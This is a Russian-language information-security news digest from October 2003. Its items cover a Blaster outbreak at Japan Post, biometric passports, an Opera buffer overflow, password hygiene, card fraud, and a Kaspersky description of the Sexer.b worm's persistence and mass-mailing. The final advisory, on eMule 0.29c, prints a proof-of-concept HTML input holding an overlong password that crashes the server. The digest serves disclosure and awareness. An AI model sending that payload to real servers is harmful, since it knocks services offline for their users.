Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

15 новостей по информационной безопасности каждый день


Информационный Канал Subscribe.Ru


Информационная безопасность на Стра.тег.ру за 2003/10/23 00:50 - 2003/10/23 23:50


Иногда они возвращаются снова

23 октября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны

Вспышка изрядно нашумевшего вируса Blaster зафиксирована в почтовой службе Японии.

Как сообщает Associated Press, неожиданная вспышка вируса Blaster на несколько часов парализовала работу компьютерных сетей японского почтового ведомства. По официальной информации, распространенной руководством Japan Post, вспышка была зафиксирована во вторник приблизительно в 3 часа по Гринвичу, когда терминалы, находящиеся в провинциях Тояма, Исикава и Фукуи, практически одновременно включили свою антивирусную защиту.

В общей сложности администраторам пришлось на несколько часов вырубить из общей сети 2500 компьютеров в 678 филиалах компании, расположенных по Восточному побережью страны, что привело к значительным задержкам в обработке заказных писем и ценных бандеролей. Отметим в скобках, что заплатки, устраняющие уязвимость Windows к червям, вроде «Бластера», висят на сайте Microsoft уже месяца два. 0


Паспорт с глазами

23 октября | Рубрика: Информационая безопасность государственной власти Информационая безопасность общественной коммуникации, личности.

На днях министр внутренних дел Борис Грызлов официально подтвердил, что в скором будущем всем российским путешественникам, бизнесменам, ведущим дела с заграницей, и командированным придется обзавестись новыми паспортами. От "старых" зарубежных паспортов новые будут отличаться не только внешне: в микрочипе такого документа будет содержаться уникальная биометрическая информация – отпечатки пальцев, узор радужной оболочки глаза, возможно, температурная карта лица. Такой переход – не прихоть России: новые паспорта будут использовать Европа и страны "большой восьмерки", а следом за ними и весь мир. Следовательно, человек, не имеющий "электронного" удостоверения личности, через пару лет просто не сможет выехать за пределы России – его никуда не пустят.

История удостоверений личности уходит в седую древность. От фамильных перстней, верительных грамот и рекомендательных писем человечество проделало большой путь. Но все же современные паспорта, даже с многочисленными вклеенными фотографиями, высокими степенями защиты, все же не гарантированы от подделок. Несколько лет назад один датский пограничник прославился озорным экспериментом. Он вклеил в свой паспорт фотографию любимого сенбернара, и, отрастив пышные усы и бакенбарды, успешно путешествовал по Европе в течение отпуска, ни разу не задержанный своими коллегами-пограничниками и другими стражами порядка.

В России – свои особенности. По данным того же МВД, при обмене паспортов были задержаны более 70 тысяч людей, находившихся в розыске. А сколько проскочили через это сито? Угроза международного терроризма подняла проблему на новую высоту. Открытый мир, доброжелательный к торговцам и путешественникам, глобализация экономики требуют прозрачности границ. Но даже прозрачная граница должна быть надежно защищена. Выход может быть найден путем решения двух проблем – введения биометрических данных в новые удостоверения личности и ведения регистров населения. Решение обеих проблем в неявной форме заложено в ФЦП "Электронная Россия".

Однако при уровне финансирования в 20 процентов, заложенном в бюджетах трех последних лет, о заграничных поездках нам скоро всем придется забыть. Если бы только о зарубежных поездках! Государственный регистр населения как воздух нужен всему социальному блоку. Он нужен для целевой поддержки населения при оказании медицинских услуг, для выплаты льгот и пособий, для Пенсионного фонда, для налоговиков и правозащитных органов. Такого рода регистры ведутся в Швеции и Финляндии, Германии и Дании, Италии и даже у наших соседей из восточно-европейских государств. Работа над регистром началась в российских регионах в режиме пилотных проектов. Сегодня речь идет только о "социальных картах", по которым пенсионеры и другие малозащищенные слои населения могут адресно получить поддержку властей. Финансирование и, возможно, приоритеты "Электронной России" должны быть немедленно пересмотрены.

Это состоится уже в декабре на одном из заседаний Правительства. Работа по корректировке Целевой программы поручено Минсвязи – координатору такого процесса. В Федеральном бюджете наконец должна заработать строка об информатизации, которая сегодня имеет нулевой показатель. Пора перестать прятать голову в песок и создавать информационные системы по бюджету статей "геологоразведка" и "приобретение канцелярских принадлежностей"! В каждом регионе, в каждом федеральном органе власти должны быть назначены люди, отвечающие за архитектуру информационных сетей и содержание баз данных. Мы объединяем таких людей в Совет региональных конструкторов и Совет управляющих информационными технологиями.

Не менее важен этот вопрос и для наших ближних соседей из стран СНГ. Речь идет не только о гражданах России, там проживающих. Сами государства СНГ, объединенные в Совет по информатизации при Региональном Содружестве связи, уже сегодня должны взять вопрос гармонизации разработки новых "биометрических" паспортов в повестку дня своей работы. В полную силу заработала Государственная комиссия по информатизации при Минсвязи, чьи решения носят обязательный характер при выработке единой технологической политики в области информационных технологий. В нашем Министерстве по связи и информатизации вторая составляющая становится все более весомой. Кто знает, возможно через пару лет мы de facto станем Министерством информационного общества и мультимедийных технологий?

Предстоит большая разъяснительная работа. Даже в экономически более развитых странах отнюдь не все граждане в равной степени пользуются сетевыми технологиями. Здесь сказываются и боязнь новой техники, и кажущаяся сложность компьютеров, и пресловутое цифровое неравенство – неравенство в доступе к новым технологиям и информационным ресурсам. Всеми этими вопросами предстоит заняться уже в самое ближайшее время. Хотим мы быть в клубе сильнейших? Сегодня надо посмотреть друг другу в глаза, без биометрического анализа узора радужной оболочки, – пусть она будет голубой, карей или зеленой – и принять единственно правильные решения.

1

Очередной криптоконкурс

23 октября | Рубрика: События, семинары, конференции, даты

Thawte Consulting объявила об очередном конкурсе на вскрытие зашифрованного текста, который начнется 27 октября. Для решения поставленной задачи не потребуются значительные вычислительные ресурсы - по крайней мере, в предыдущих конкурсах использовались вариации на тему достаточно простых подстановочных шифров. Победитель получит экземпляр книги Митника "The Art of Deception".

С предыдущими заданиями можно ознакомиться здесь.

2

Управление информатизации Москвы объявило три конкурса в рамках программы "Электронная Москва"

23 октября | Рубрика: Информационные ресурсы

Управление информатизации Москвы объявило три конкурса в рамках городской целевой программы "Электронная Москва".

Как сообщается в бюллетене "Конкурсные торги", в частности, объявлен конкурс:

  • на разработку проектной документации общегородской среды электронного взаимодействия;
  • на создание и развитие общегородской среды электронного взаимодействия городских органов власти между собой, с хозяйствующими субъектами и населением;
  • на право заключения государственного контракта на создание и развитие системы учета, регистрации и оценки информационных ресурсов и систем, созданных за счет городских средств, и на разработку и реализацию системы мониторинга движения Москвы к информационному обществу.

Организатор конкурса – государственное унитарное предприятие "Экономика" (Москва). Срок приема конкурсных заявок – 11–12 ноября 2003 г.

3

3Com выпустил маршрутизаторы и решения безопасности VPN для SOHO

23 октября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.

Компания 3Com представила новые продукты — маршрутизаторы для удаленных офисов корпораций 3Com Router 3000, новые средства защиты и маршрутизаторы для предприятий малого размера 3Com OfficeConnect VPN Firewall и OfficeConnect Secure Router.

Семейство 3Com Router 3000, в которое входят три модели маршрутизаторов с фиксированным форм-фактором и разными интерфейсами глобальной сети (WAN), соответствует требованиям малого офиса в области коммуникаций и безопасности и поддерживает такие сервисы, как приоритезация трафика (QoS), IP и IPX Routing, сложная фильтрация и широкое вещание. Маршрутизаторы Router 3000 имеют настольную конструкцию и поставляются с оптимальным объемом оперативной памяти и всеми средствами маршрутизации и защиты, а также с встроенными готовыми приложениями.

Источник: пресс-релиз компании.

4

В Екатеринбурге прошла очередная региональная конференция "Электронной России"

23 октября | Рубрика: События, семинары, конференции, даты

22 октября 2003 года в Екатеринбурге прошла 5-я региональная конференция Министерства РФ по связи и информатизации «Электронная Россия — человеку, бизнесу, обществу». На конференции были рассмотрены приоритетные направления реализации ФЦП «Электронная Россия (2002-2010 гг.)», региональных и муниципальных программ информатизации Уральского федерального округа. В работе конференции приняли участие более 200 представителей органов власти, научных и образовательных учреждений, а также бизнес-сообщества.

С приветственным словом к собравшимся выступил министр Российской Федерации по связи и информатизации Леонид Рейман. В своем выступлении министр затронул актуальные вопросы, касающиеся эффективного развития инфокоммуникационных технологий на всей территории России. В частности, министр обозначил важность гармонизации региональной нормативно-правовой базы и федерального законодательства в области ИКТ. Например, в области повышения открытости деятельности органов государственного управления Рейман предложил взять за основу Постановление Правительства РФ № 98 «Об обеспечении доступа к информации о деятельности Правительства Российской Федерации и федеральных органов исполнительной власти». Также в докладе министра была обозначена важность разработки и применения единых технологических стандартов и форматов предоставления и размещения информации в информационных системах органов государственной власти субъектов Уральского федерального округа.

Касаясь непосредственно Уральского федерального округа, Леонид Рейман призвал информатизаторов УрФО разработать комплексную программу развития инфокоммуникационного пространства округа, соотносящуюся по целям и задачам, как с ФЦП «Электронная Россия», так и с программой социально-экономического развития России на среднесрочную перспективу. При этом было отмечено, что все региональные программы информатизации должны планироваться, как минимум, на среднесрочную перспективу, что позволит федеральному правительству наиболее эффективно оказывать методологическую и материальную поддержку регионам в сфере ИКТ. Министр также предложил регионам при подготовке заявок на бюджетное софинансирование проектов информатизации применять принципы современного бизнес-планирования. Затрагивая тему финансирования, министр отметил, что анализ расходов на информатизацию в УрФО выявил неравномерность финансирования ИКТ проектов со стороны субъектов УрФО. В качестве способа выравнивания ситуации Л. Рейман предложил регионам УрФО уделить особое внимание привлечению внебюджетных источников финансирования, а также осуществлять совместные межрегиональные проекты, позволяющие сократить издержки на их реализацию. В заключение министр пожелал участникам конференции эффективной и плодотворной работы по укреплению связей в области ИКТ между Минсвязи России и субъектами Уральского федерального округа.

Предыдущие региональные конференции «Электронная Россия — человеку, бизнесу, обществу» прошли 14 мая в Москве, 10 июня в Нижнем Новгороде, 1 июля в Краснодаре и 30 сентября во Владивостоке.

Источник: сообщение пресс-центра ФЦП «Электронная Россия».

5

Microsoft расширяет программу shared source

23 октября | Рубрика: Информационные ресурсы

Источник: zdnet В среду Microsoft сообщила о расширении программы доступа к своим исходным кодам людям со стороны. Программа shared source уже позволила правительствам некоторых стран и технологическим фирмам получить исходный код отдельных продуктов Microsoft. Теперь компания вводит новую категорию допущенных к ее кодам — так называемых «наиболее ценных профессионалов» (Most Valuable Professionals, MVPs), независимых программистов, принимающих активное участие в работе сообщества онлайновой поддержки Microsoft.

«Я большой фанат MVPs. Они очень помогают заказчикам Microsoft, — говорится в заявлении вице-президента Microsoft Джима Олчина. — Предоставление MVPs доступа к одному из наших наиболее ценных ресурсов, исходному коду Windows, свидетельствует о том, сколь важное значение мы придаем этой группе преданных людей». По его словам, предоставление более широкого доступа к коду Microsoft поможет им «сделать еще больше для технических сообществ всего мира и повысить качество поддержки для каждого, кто пользуется платформой Windows».

Участники различных shared-source программ Microsoft могут изучать код некоторых продуктов Microsoft, но не могут вносить в него изменения или использовать его в собственных проектах. Этим программа отличается от проектов open-source, таких как Linux, участники которых могут изучать код, вносить изменения, а затем распространять модифицированный код.

MVPs уже имеют доступ к исходному коду некоторых программ Microsoft, включая компоненты Windows CE .Net и Visual Studio .Net, но по новой программе они получат доступ к основному коду операционной системы Windows, включая Windows 2000, Windows XP и Windows Server 2003. Microsoft делает код Windows доступным почти для 1200 из 1800 MVPs — тех, кто специализируется на Windows, Windows Server System и Visual Developer. Microsoft не платит MVPs, но предоставляет возможность пользоваться своими ресурсами по обучению и доступ к высокопоставленным представителям компании, а также делает скидки при продаже ПО.

Компания ожидает широкого участия MVPs в новой программе, сказал менеджер программы shared-source Джейсон Матусов. В начале этого года Microsoft провела опытную программу, в рамках которой код Windows могли изучить 200 MVPs. Компания получила 31 заявление на участие, причем 27 из числа подавших заявления согласились с лицензионными условиями Microsoft.

Пока программа не охватывает такие приложения, как Office, но Матусов сказал, что Microsoft рассмотрит возможность ее расширения, если это будет способствовать усилиям MVPs по поддержке. В целом, по словам Матусова, Microsoft очень заинтересована в программе shared-source. Компания постоянно работает над ее расширением, но все еще налагает ограничения на то, где и с кем делиться своим кодом. «Если предоставлять доступ всем, то его получат как хорошие парни, так и плохие, — говорит Матусов. — Мы принципиально работаем только с теми, кому вполне доверяем».

6

Дыра в браузере Opera

23 октября | Рубрика: Дыры и патчи программ и операционных сред

Компания AtStake сообщила об обнаружении опасной дыры в браузере Opera версий 7.11 и 7.20 для платформ Windows и Linux. Другие версии браузера не тестировались, и о том, есть ли в них указанная дыра, точно неизвестно. Обнаруженная уязвимость носит критический характер и позволяет злоумышленнику выполнить на компьютере жертвы произвольный код.

Уязвимость в Opera связана с переполнением буфера при обработке некоторых гиперссылок. Для использования дыры хакер должен создать веб-страницу с особым образом записанной ссылкой. При рендеринге такой страницы произойдет ошибка, позволяющая хакеру делать с системой все, что угодно. Атаку можно проводить как на сам браузер, так и на почтовый клиент, поставляемый в комплекте с браузером.

Дыра была обнаружена специалистами AtStake в конце сентября. На устранение дыры у разработчиков Opera ушло две недели. Итогом этой работы стал выпуск версии с номером 7.21. В Opera не выпускали никаких специальных бюллетеней об обнвружении дыры, она упоминают в списке изменений как устранение сбоя в браузере при обработке неправильных имен серверов.

7

Руководство по уходу за паролем

23 октября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны

Похоже, хакеры решили переориентировать свою деятельность. В связи с тем, что компании защищают собственные сети все эффективней, злоумышленники переключились на выявление паролей. И опасность в данном случае увеличивается от того, что конечные пользователи до сих пор остаются слабым местом корпоративной защиты. Особенно, когда дело касается «всего-навсего пароля».

Специалисты по компьютерной безопасности провели в интернете исследование и получили такой результат: 15% представителей опытной аудитории без колебаний выдавали сетевой пароль, когда взамен им обещали включение в число участников розыгрыша призов.

По словам Пола Влиссидиса (Paul Vlissidis) из NCC Group, основная проблема персонала, и особенно – ИТ-служб, которые должны лучше разбираться в предмете, - это халатное отношение к паролям, что ставит под угрозу защищенность корпоративных сетей. "Вопрос заключается в том, что лень и невежество приводят к проблемам с безопасностью сетей, - отмечает он. – Пароли играют сейчас еще большую роль – с появлением широкополосной связи в домах все больше сотрудников пользуются удаленным соединением". И по мере того, как ИТ-подразделения совершенствуют защиту офисных сетей, хакерам приходится все чаще прибегать к методам социального инжиниринга, чтобы выманить пароли у пользователей.

В качестве примеров халатного отношения к паролям Пол Влиссидис назвал случаи, когда весь отдел компании совместно использует пароли, или когда в качестве пароля выбирается какое-либо популярное слово – название футбольного клуба и т.п. Топ-менеджеры компаний часто больше других нарушают правила выбора и использования паролей, отметил эксперт, напоминая, что в качестве пароля лучше использовать не слова, а сочетания букв и цифр. Чтобы не забыть пароль, можно выбрать любимую песню или стихотворение и взять первую букву из каждой строчки первого куплета, советует г-н Влиссидис, добавив несколько цифр. "Пока вы знаете, что это за песня, вы никогда не забудете пароль", - утверждает он.

8

Мошенничество с пластиковыми картами

23 октября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны Информационая безопасность общественной коммуникации, личности.

Британские банки ежегодно теряют около 300 млн. фунтов стерлингов в результате мошенничества с пластиковыми карточками. К 2005 году эти цифры, по подсчетам экспертов, могут возрасти до 800 млн. фунтов, передает корреспондент РИА "Новости".

В связи с этим, британское банковское сообщество начало переговоры с министерством внутренних дел о выделении средств на усиление спецподразделений по борьбе с этими видами преступлений.

Банки и компании, имеющие отношение к выпуску и обеспечению хождения пластиковых карточек, также планируют к 2004 году ввести в обращение в Великобритании так называемые "смарт-карты", которые имеют повышенный уровень защиты. Проект оценивается в 1,1 млрд. фунтов стерлингов.

Великобританские сыщики периодически «накрывают» преступные группы, которые грабят банки и их клиентов с помощью поддельных пластиковых карт. При этом мошенники создают целую сеть из подручных и подельщиков - они пополняют «банки данных» преступников о номерах и кодах пластиковых карт.
9


Червивый кибертерроризм

23 октября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны

Компьютерные вирусы становятся более изощренными и разрушительными. Идеология тотальной свободы, ставшая причиной столь колоссальной популярности Интернета, одновременно с этим оказывает негативное воздействие на развитие Всемирной Сети, позволяя оперировать в ней, например, хакерам и авторам вирусов. По оценкам консалтинговой фирмы "@Stake", до 70% удачных компьютерных атак используют «дыры» в программном обеспечении, при этом в девяти случаях из десяти сами производители программ изначально знали о подобных недостатках своего продукта.

На сегодняшний день в мире не существует законодательства, которое обязывает софтверные компании производить «безопасные» программы.

Авторы вирусов используют не только технологические, но и «психологические» бреши. Исследование, проведенное федеральным агентство США InfraGard, показало, что примерно каждый пятый пользователь Сети, пострадавший от вирусов типа "Anna Kournikova"", Sean Connery", "Julia Roberts", "Elvis Presley Lives", "Explicit Hot Porn", открывали вложенные файлы с этим названием, несмотря на полученные предупреждения. Их подводила любовь к Анне Курниковой, Шону Коннери или порнографии.

Если раньше компьютерные вирусы были только проблемой программистов и пользователей Интернета, то сегодня они начали оказывать серьезное деструктивное влияние на мировую экономику.

Исследовательская организация «Information Week Research» опросила почти 5 тыс. профессионалов в сфере информационных технологий и пришла к выводу, что в 2000 году совокупные потери американских фирм от действий вирусов составили $266 млрд. или 2.5% валового внутреннего продукта страны.

По данным Института компьютерной безопасности (Computer Security Institute), общий ущерб, который нанесли компьютерные вирусы за последние пять лет, оценивается, как минимум, в $54 млрд.

По данным маркетинговой фирмы Edelman, компьютер каждого третьего пользователя Интернет в США хотя бы раз в течение последнего года подвергался атакам компьютерных вирусов. По оценкам CERT Coordination Center, количество вирусных атак в США увеличивается в геометрической прогрессии. В 2001 году их было более 58 тыс., в 2002 году их число превысило 82 тыс. За первые шесть месяцев 2003 года было зафиксировано более 76.4 тыс. вирусных атак. Эпидемия компьютерных вирусов фактически дала жизнь новой отрасли экономики - ежегодно производители антивирусного программного обеспечения зарабатывают до $2 млрд.
10


Sexer.b: не станьте жертвой социальной активности вирусописателя

23 октября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны

"Лаборатория Касперского" предупреждает о распространении новой версии интернет-червя Sexer. Червь рассылает себя, маскируясь под сообщение технической службы "Лаборатории Касперского" с вложенным exe-файлом. При открытии файла-вложения происходит заражение компьютера. Зафиксировано несколько обращений от российских пользователей.

Напомним, предыдущая версия вредоносной программы Sexer была обнаружена 15 октября этого года. Будучи ничем не примечательным с точки зрения технического исполнения, вирус представлял собой первый образец комбинированного использования методов социального инжиниринга и политических пиар-технологий.

Автор новой версии вредоносной программы также ограничился примитивными техническими средствами, сделав ставку на психологию пользователя. Для распространения вредоносной программы используется один из излюбленных методов социального инжиниринга - фальсификация адреса отправителя, маскировка письма под сообщение технической службы производителя популярного программного обеспечения или антивирусной компании.

В данном случае вредоносная программа рассылается якобы с адреса технической поддержки "Лаборатории Касперского" support@kaspersky.com. Тема письма: "Утилита для выявления и удаления почтовых червей". Письмо содержит вложенный файл KAVUtil.exe.

http://stra.teg.ru/lenta/security/4357/sexer-b-2.gif/sexer-b-2.gif

Текст письма: "В связи с появлением в Сети нового почтового червя I-Worm.Sexer предлагаем Вам утилиту для выявления и удаления этого червя из системы. Описание I-Worm.Sexer доступно в Вирусной Энциклопедии Касперского по адресу: http://www.viruslist.com/viruslist.html"

Червь получает управление, только если пользователь самостоятельно откроет вложенный файл.

При открытии файла, вредоносная программа устанавливает фоном рабочего стола Windows картинку с текстом "АБОРТ - узаконенное убийство".

http://stra.teg.ru/lenta/security/4357/sexer-b-1.gif/sexer-b-1.gif

Для запуска процедуры размножения червь копирует себя в директорию "Program Files\Common Files\system" c именем KAVUtil.exe и регистрирует в ключе автозапуска системного реестра:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run KAVUtil]
"KAVUtil" = "kavutil.exe".

Червь также ищет в системном реестре ключ: [Software\Microsoft\WAB\WAB4\Wab File Name] и рассылает себя по всем адресам электронной почты, найденным в адресной книге. Для рассылки писем используется прямое подключение к SMTP-серверу.

"Заражение компьютеров пользователей - не лучший способ для демонстрации собственной социальной позиции. Фальсификация адреса отправителя и маскировка письма под сообщение службы технической поддержки антивирусной компании довольно распространенный метод особенно среди начинающих вирусописателей, - прокомментировала появление вредоносной программы Светлана Новикова, менеджер по корпоративным коммуникациям и PR "Лаборатории Касперского". - Использование вирусописателем технически примитивных средств, а также общая компьютерная грамотность большинства современных пользователей, делают шансы на распространение данной вредоносной программы невысокими. Кроме того, важно отметить, что в соответствии со стандартами информационной безопасности, техническая служба "Лаборатории Касперского" никогда не рассылает исполняемые файлы, и наши пользователи прекрасно об этом осведомлены".

Процедуры защиты от данного сетевого червя уже добавлены в базу данных Антивируса Касперского®.

Более подробное описание I-Worm.Sexer.b доступно в Вирусной Энциклопедии Касперского.

11

Подведены итоги конкурса плакатов по безопасности

23 октября | Рубрика: События, семинары, конференции, даты

Московский открытый творческий Конкурс "БИнОМ" ("Безопасность-Информация-Общество-Мировоззрение") проводился с просветительской миссией. Основной его целью было привлечение внимания общественности к одной из самых основных потребностей человека – потребности в безопасности, формирование в общественном сознании понимания основополагающего значения информации в системе безопасности.

Задача конкурса – художественными средствами показать, что безопасность – это не бронестекло "шестисотого", мощная железная дверь или профессиональный охранник, а, прежде всего, вовремя полученная информация, анализ угроз и рисков, прогноз и создание систем и мер по их предотвращению или устранению.

Организаторами конкурса выступили ЗАО "Специальная Информационная Служба" ("СИнС"), компания "Защита ЭКСПО" и РИА "ПроЭкспо".

Участниками конкурса стали дизайнеры не только из России, но и стран ближнего зарубежья. География участников: Москва, Новосибирск, Волгодонск, Волгоград, Калининград, Вологда, Рига и т.д. Всего на конкурс было получено 32 плаката.

В заседании жюри приняли участие: Рудницкая Антонина Николаевна – Вице-президент Союза Дизайнеров Москвы; Бауман Георгий Владимирович – директор по развитию портала Сек.ру; Крылов Александр Сергеевич - генеральный директор СБ "Амулет"; Минаев Сергей Юрьевич – генеральный директор Специальной Информационной Службы; Рунге Владимир Федорович - Вице-президент Международной ассоциации "Союз дизайнеров", лауреат Государственной премии России по дизайну, профессор; Солдатов Андрей Алексеевич – журналист газеты "Версия"; Филоненко Игорь Константинович – Генеральный директор компании "Защита ЭКСПО", Исполнительный директор Международного Форума "Технологии безопасности".

По результатам долгих обсуждений и споров, лауреатом конкурса в номинации "Плакат" стал дизайнер Чижиков А.А. (плакат "Защити себя в море информации"). Поощрительные премии получили: Захаров Д.Ю. за плакат "Предупрежден, значит вооружен" и Чернышенко А.Л. за плакат "Есть информация, есть и бизнес". Специальный Приз Форума "Технологии безопасности" (фирменные часы) был присвоен Федоровой О.В. за плакат "Безопасность в информации". Номинации "Карикатура" и "Текст" по причине отсутствия конкурсных работ были упразднены.

Награждение победителей и лауреатов конкурса состоялось 17 октября в ресторане гостиничного комплекса "МИР". Фотоотчет можно посмотреть на сайте "БИнОМ"а.

В планах организаторов – сделать конкурс "БИнОМ" ежегодным.

Источник: пресс-релиз Международного форума "Технологии безопасности"

12

DSSL на 8-й специализированной выставке "Безопасность. Телекоммуникации. Информация"

23 октября | Рубрика: События, семинары, конференции, даты

C 14 по 17 октября в Самаре прошла 8-ая специализированная выставка "Безопасность.Телекоммуникации.Информация". Продукцию компании DSSL - ЦСВА Sivineya DV - на этой выставке представил официальный дилер в данном регионе – ООО "Безопасность – Сервис". Сравнивания результаты прошедшей выставки с прошлогодними, можно говорить о существенном всплеске интереса аудитории к цифровым системам.

Источник: пресс-релиз компании DSSL

13

Управление Правительства Москвы учит безопасности... своих

23 октября | Рубрика: События, семинары, конференции, даты

В соответствии с Распоряжением Правительства Москвы от 14 августа этого года, Управление Правительства Москвы по экономической безопасности города Москвы совместно с Управлением государственной службы и кадров Правительства Москвы проводит обучение специалистов органов исполнительной власти. Курсы называются - "Переподготовка и повышение квалификации кадров в области обеспечения экономической и собственной безопасности".

Наша редакция неоднократно публиковала тематические материалы об активной деятельности этого Управления

Вчера состоялось второе занятие, присутствовало более 150 чиновников. Организаторы постарались сделать это мероприятие неформальным, вопросы могли задаваться из зала. Регистрация была четко организована, каждому слушателю были выданы информационные и опросные материалы. Ответственные исполнители курсов – Информационно-аналитический и образовательный центр по проблемам экономической и информационной безопасности Гуманитарно-экономического и информационно-технологического института (ГЭИТИ) и Учебный центр ГУП города Москвы "Центр информационно-аналитических технологий" (ГУП "ЦИАТ").

Целью обучения, как сказано в информационных материалах, является изучение основ экономической безопасности и выработка необходимых практических навыков для решения оперативно-служебных задач. Обучение слушателей проводится в два потока, с различным количеством учебных часов.

Наш корреспондент присутствовал на занятии, и отметил высокий статус присутствующих и ответственных за обеспечение экономической безопасности, и подготовленность выступающих. Шел деловой разговор о различных аспектах экономической безопасности столицы России, на этот раз о контрольно-финансовых, приводились конкретные примеры роли и места органов исполнительной власти. Обсуждались также вопросы информационной безопасности, коммерческой тайны и промышленного шпионажа.

14

Американский Сенат воюет со спамом

23 октября | Рубрика: Регулирование: Законы, постановления, сертификация, контроль

В среду американские сенаторы одобрили новый законопроект, направленный против рекламных рассылок по электронной почте. Законопроект, предложенный сенатором-республиканцем от штата Монтана Конрадом Бернсом и сенатором-демократом из Орегона Роном Уайденом. Законопроект запрещает рассылки рекламных писем с поддельными обратными адресами и сбор почтовых адресов в интернете с помощью программных роботов. Во всех рекламных рассылках обязательно должна присутствовать действующая возможность отказа от получения писем и физический адрес отправителя.

Кроме того, в законопроект были внесены несколько дополнений. Сенатор-демократ от штата Нью-Йорк Чарльз Шумер предложил обязать Федеральную комиссию США по торговле создать специальные списки адресов, владельцы которых не желают получать рекламные рассылки. Такие списки уже действуют для желающих отказаться от телефонного маркетинга. Впрочем, Ассоциация компаний, занимающихся прямым маркетингом, назвала это предложение неудачным и неработоспособным.

Что касается ответственности для нарушителей, то она предусмотрена поправкой, внесенной сенаторами Оррином Хэтчем и Патриком Лихи. Они предлагают наказывать спамеров лишением свободы сроком до трех лет. Спамерам также будет запрещено взламывать компьютеры с целью превращения их в источники рассылок. О поддержке нового законопроекта уже заявили такие крупные игроки интернет-рынка, как Microsoft и America Online. Поддерживают законопроект и в администрации президента США, однако в Палате представителей Конгресса законопроект пока буксует.

15

DoS против eMule

23 октября | Рубрика: Дыры и патчи программ и операционных сред

Программа: eMule 0.29с

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в eMule. Удаленный пользователь может аварийно завершить работу eMule службы.

Удаленный пользователь может представить чрезмерно длинное значение в параметре 'password', чтобы аварийно завершить работу eMule сервера.

Пример/Эксплоит:

<input type="password" name=p size=37
value="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
